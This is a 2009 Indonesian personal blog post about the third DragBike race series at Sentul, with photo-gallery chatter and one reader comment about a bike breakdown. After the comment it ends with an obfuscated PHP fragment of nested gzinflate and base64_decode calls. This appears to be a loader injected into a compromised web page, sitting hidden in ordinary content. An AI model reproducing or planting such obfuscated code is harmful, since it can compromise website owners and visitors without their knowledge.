Delicious

Archives

Categories

DragBike Seri III 2009

  ozzie / 07/12/2009


Sentul 5-6 Desember 2009

Seri terakhir di tahun 2009.. berhubung cuman ada 3 seri di tahun ini dan kemaren cuman seri 1 ajah yg gw ikutan.. moga2 tahun depan si-merah bisa ikut berpartisipasi kembali… [-o< [-o<

Drag seri 3 2009 -sentul

karena pengeluaran lebih banyak lari ke lensa dan aksesoris nyah ;)) dan masih doyan foto-foto..

ozzie nich

dokumentasi hasil jepret2 seri 3 kemaren bisa liat di gallery gue nich:D:D


« »


One Response to “DragBike Seri III 2009”

  1. san san Says:

    ituu tu mtr aku massss…jokinya amatiran..pas mogok abis bensin.start terakhir,,,busipun mati,,maklum bru pertama kali,,mtr pun nga d potong,,,,joki pun lgi nyari,,,ntar mungkin dipersiapkan lebih baek…thanks


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>